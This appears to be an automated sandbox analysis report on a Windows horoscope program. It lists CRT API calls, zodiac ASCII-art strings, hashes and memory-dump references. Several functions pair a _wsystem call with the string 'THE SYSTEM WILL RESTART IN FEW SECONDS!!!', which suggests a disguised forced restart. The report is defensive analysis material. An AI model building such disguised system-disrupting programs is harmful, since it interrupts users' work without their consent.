                                                                          • API ID: _wprintf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s__wsystem_flsall_free_wscanf
                                                                          • String ID: THE SYSTEM WILL RESTART IN FEW SECONDS!!!$Age=%d$Name: %s$Sex=%c$cls
                                                                          • API String ID: 516305062-1074222490
                                                                          • Opcode ID: f0b26496efaa4ea7d3f5e2a26c917568c142279e2c5e496ea91fe030bb948fe6
                                                                          • Instruction ID: 86cb004e9275c67ad7b05a95e0c484699b3677fae0c5d82285a5615add4dc786
                                                                          • Opcode Fuzzy Hash: f0b26496efaa4ea7d3f5e2a26c917568c142279e2c5e496ea91fe030bb948fe6
                                                                          • Instruction Fuzzy Hash: 56F0A4FA940246BAC6147FEEBC4686EBA68AB6736DF01021CE51465204DB70010C87E2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D6F86, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                          • __wsystem.LIBCMT ref: 013D6F99
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D6FAE
                                                                          • _wprintf.LIBCMT ref: 013D6FE4
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1A5F
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1A73
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1A87
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1A9B
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1AAF
                                                                            • Part of subcall function 013D1A50: _wprintf.LIBCMT ref: 013D1AC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D6FC6
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D701B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s__wsystem_flsall_free_wscanf
                                                                          • String ID: THE SYSTEM WILL RESTART IN FEW SECONDS!!!$Age=%d$Name: %s$Sex=%c$cls
                                                                          • API String ID: 516305062-1074222490
                                                                          • Opcode ID: 833954bb1b72ac906ed5868c0ce6deb19a724bd44e5eae6b876988e72164ddec
                                                                          • Instruction ID: f45569f84bba37e45d612c59da0f072b2f4fca77a8c2a7eeb609051f248cd0ce
                                                                          • Opcode Fuzzy Hash: 833954bb1b72ac906ed5868c0ce6deb19a724bd44e5eae6b876988e72164ddec
                                                                          • Instruction Fuzzy Hash: 2EF044B7940256BAC720BFEEBC45CAFBB68EB6636CF01061DF51466208DB75005887E2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D6125, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                          • __wsystem.LIBCMT ref: 013D6138
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D614D
                                                                          • _wprintf.LIBCMT ref: 013D6183
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D194F
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D1963
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D1977
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D198B
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D199F
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D19B3
                                                                            • Part of subcall function 013D1940: _wprintf.LIBCMT ref: 013D19C7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D6165
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D61B2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s__wsystem_flsall_free_wscanf
                                                                          • String ID: THE SYSTEM WILL RESTART IN FEW SECONDS!!!$Age=%d$Name: %s$Sex=%c$cls
                                                                          • API String ID: 516305062-1074222490
                                                                          • Opcode ID: 2a9ff3204b8e434fbbf0541bd97f2e1b33b6b48a95126532de57d3cbcdd0fc54
                                                                          • Instruction ID: 834b06d6827807ab2d6afebed8decab37e9bacc83724948590ee9d40027fb71a
                                                                          • Opcode Fuzzy Hash: 2a9ff3204b8e434fbbf0541bd97f2e1b33b6b48a95126532de57d3cbcdd0fc54
                                                                          • Instruction Fuzzy Hash: B6F062F7940242AAC6247FEEFC46C6EB668AB6636DF01062DE55965204DB71011C87B2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D6838, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                          • __wsystem.LIBCMT ref: 013D684B
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D6860
                                                                          • _wprintf.LIBCMT ref: 013D6896
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D19DF
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D19F3
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D1A07
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D1A1B
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D1A2F
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D1A43
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D6878
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D68C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s__wsystem_flsall_free_wscanf
                                                                          • String ID: THE SYSTEM WILL RESTART IN FEW SECONDS!!!$Age=%d$Name: %s$Sex=%c$cls
                                                                          • API String ID: 516305062-1074222490
                                                                          • Opcode ID: 385ce78f04d8ca3264ac8dbed3c8ec226e5d5e1e563e68b92611154b2dbc3e2e
                                                                          • Instruction ID: 84c9c8d5471437eb00ac88fb6e17218549b407d11f7f3874831519ea68a3573b
                                                                          • Opcode Fuzzy Hash: 385ce78f04d8ca3264ac8dbed3c8ec226e5d5e1e563e68b92611154b2dbc3e2e
                                                                          • Instruction Fuzzy Hash: ECF062BB940246BAC6247BEEBC45C6EB768AB6736DF01061DE55465208DB71011C87B2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D4AEE, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                          • __wsystem.LIBCMT ref: 013D4B01
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D4B16
                                                                          • _wprintf.LIBCMT ref: 013D4B4C
                                                                            • Part of subcall function 013D17E0: _wprintf.LIBCMT ref: 013D17EF
                                                                            • Part of subcall function 013D17E0: _wprintf.LIBCMT ref: 013D1803
                                                                            • Part of subcall function 013D17E0: _wprintf.LIBCMT ref: 013D1817
                                                                            • Part of subcall function 013D17E0: _wprintf.LIBCMT ref: 013D182B
                                                                            • Part of subcall function 013D17E0: _wprintf.LIBCMT ref: 013D183F
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D4B2E
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D4B7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s__wsystem_flsall_free_wscanf
                                                                          • String ID: THE SYSTEM WILL RESTART IN FEW SECONDS!!!$Age=%d$Name: %s$Sex=%c$cls
                                                                          • API String ID: 516305062-1074222490
                                                                          • Opcode ID: 9db02e6bd9f88918abb2e9d6298c3181256d3546d054ecffbfd7dc6320905cab
                                                                          • Instruction ID: 37d55c35301be2c017be3541725a21665ac3de4f5952103a7bea65620c15212a
                                                                          • Opcode Fuzzy Hash: 9db02e6bd9f88918abb2e9d6298c3181256d3546d054ecffbfd7dc6320905cab
                                                                          • Instruction Fuzzy Hash: E1F0A4F7900242AAC624BBEEBC4AC6EB724AB6636DF01061CE51465204DB700008C7A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D17E0, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D17EF
                                                                          • _wprintf.LIBCMT ref: 013D1803
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D1817
                                                                          • _wprintf.LIBCMT ref: 013D182B
                                                                          • _wprintf.LIBCMT ref: 013D183F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: ( )$(_) /$(_,$.--.$Your horoscope sign is Leo-The Lion
                                                                          • API String ID: 2991887721-1000103477
                                                                          • Opcode ID: e7092f9b3684920398c660c1c3ecd98b355292558d6d21d1228419d59ec9db0d
                                                                          • Instruction ID: da1119feaf320e2429d2708d886a76bcc53385e96455e6a5d80aeb3488a0abde
                                                                          • Opcode Fuzzy Hash: e7092f9b3684920398c660c1c3ecd98b355292558d6d21d1228419d59ec9db0d
                                                                          • Instruction Fuzzy Hash: DEE0BFA79543C2ADEA10BB57B909A06775A779672CF43061C921915718FBB4001C8751
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D15D0, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D15DF
                                                                          • _wprintf.LIBCMT ref: 013D15F3
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D1607
                                                                          • _wprintf.LIBCMT ref: 013D161B
                                                                          • _wprintf.LIBCMT ref: 013D162F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: (_ \ / _)$.-. .-.$Your horoscope sign is Aries-The Ram$|
                                                                          • API String ID: 2991887721-3135975108
                                                                          • Opcode ID: df487bc1cc1abc3d766c3d0f017eec65f54dfe8535fb62f219b3d76e20a93d27
                                                                          • Instruction ID: f1d926101d5953a980bfecc597ec4e9ebb2d2f8b4b3101fc0ab094fcff41492c
                                                                          • Opcode Fuzzy Hash: df487bc1cc1abc3d766c3d0f017eec65f54dfe8535fb62f219b3d76e20a93d27
                                                                          • Instruction Fuzzy Hash: 96E0BFA61443C269C610BB56F909B1AB65A7757B3CF43061CD15425729EBB44004C715
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D18E0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D18EF
                                                                          • _wprintf.LIBCMT ref: 013D1903
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D1917
                                                                          • _wprintf.LIBCMT ref: 013D192B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: Your horoscope sign is Libra-The Balance$___.' '.___$____________
                                                                          • API String ID: 2991887721-195284042
                                                                          • Opcode ID: 8977b98393c63270f00d6662fddfe334979b17ff4f47c0717b4aabf2329e601b
                                                                          • Instruction ID: 2c84f92d427a80474529f3b03231e213327892c5743fca7a4b73f5620f064588
                                                                          • Opcode Fuzzy Hash: 8977b98393c63270f00d6662fddfe334979b17ff4f47c0717b4aabf2329e601b
                                                                          • Instruction Fuzzy Hash: BCD017A61443C66AC2107F56F92DE08B65AB767B2CF83061C822826618EBB444088719
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013DD49A, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __getptd_noexit.LIBCMT ref: 013DD4A1
                                                                            • Part of subcall function 013E34E6: GetLastError.KERNEL32(00000001,00000000,013E04FF,013DFEAC,00000000,?,013DF0BF,?,00000001,?,?,013E199B,00000018,013F8BB0,0000000C,013E1A2B), ref: 013E34EA
                                                                            • Part of subcall function 013E34E6: ___set_flsgetvalue.LIBCMT ref: 013E34F8
                                                                            • Part of subcall function 013E34E6: __calloc_crt.LIBCMT ref: 013E350C
                                                                            • Part of subcall function 013E34E6: DecodePointer.KERNEL32(00000000,?,013DF0BF,?,00000001,?,?,013E199B,00000018,013F8BB0,0000000C,013E1A2B,?,00000000,?,013E28CE), ref: 013E3526
                                                                            • Part of subcall function 013E34E6: __initptd.LIBCMT ref: 013E3535
                                                                            • Part of subcall function 013E34E6: GetCurrentThreadId.KERNEL32 ref: 013E353C
                                                                            • Part of subcall function 013E34E6: SetLastError.KERNEL32(00000000,?,013DF0BF,?,00000001,?,?,013E199B,00000018,013F8BB0,0000000C,013E1A2B,?,00000000,?,013E28CE), ref: 013E3554
                                                                          • __calloc_crt.LIBCMT ref: 013DD4C3
                                                                          • __get_sys_err_msg.LIBCMT ref: 013DD4E1
                                                                          • _strcpy_s.LIBCMT ref: 013DD4E9
                                                                          • __invoke_watson.LIBCMT ref: 013DD4FE
                                                                          Strings
                                                                          • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 013DD4AE, 013DD4D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__initptd__invoke_watson_strcpy_s
                                                                          • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                          • API String ID: 69636372-798102604
                                                                          • Opcode ID: a7171d9f08bfc1bbdcc538b05a9b753f05793c20eae6a73ee143aabf7766c8ac
                                                                          • Instruction ID: 10f3db01319e460705cffa7519b7b56a8827128633cc8dee28e9d5a906f18745
                                                                          • Opcode Fuzzy Hash: a7171d9f08bfc1bbdcc538b05a9b753f05793c20eae6a73ee143aabf7766c8ac
                                                                          • Instruction Fuzzy Hash: F0F0246360432967CA213EEE7C848BB72FC9B6162CB02443AF60AB75C1ED61B9414190
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1C00, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D1C13
                                                                          • _wprintf.LIBCMT ref: 013D1C30
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D1C4F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: Age=%d$Name: %s$Sex=%c
                                                                          • API String ID: 2991887721-4255258559
                                                                          • Opcode ID: beed6df163babd11f9a72ecd511d3ae51c7e586f43cc77f8ab30b4c0bfc28486
                                                                          • Instruction ID: 6cf1d5c3727580f6f559bd28f0ecdeccaaa039211a0d409a9ba94fe98a352449
                                                                          • Opcode Fuzzy Hash: beed6df163babd11f9a72ecd511d3ae51c7e586f43cc77f8ab30b4c0bfc28486
                                                                          • Instruction Fuzzy Hash: DDE0DFBA004280BEC2117FAEEC01C2ABB6DABD7BA8F01821CF94809609D7B400048761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1AD0, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 11COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wprintf.LIBCMT ref: 013D1ADF
                                                                          • _wprintf.LIBCMT ref: 013D1AF3
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D1B07
                                                                          Strings
                                                                          • ..-"-._.-"-._.-, xrefs: 013D1AF8
                                                                          • ..-"-._.-"-._.-, xrefs: 013D1AE4
                                                                          • Your horoscope sign is Aquarius-The Water Bearer, xrefs: 013D1AD0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf
                                                                          • String ID: ..-"-._.-"-._.-$..-"-._.-"-._.-$Your horoscope sign is Aquarius-The Water Bearer
                                                                          • API String ID: 2991887721-1255721400
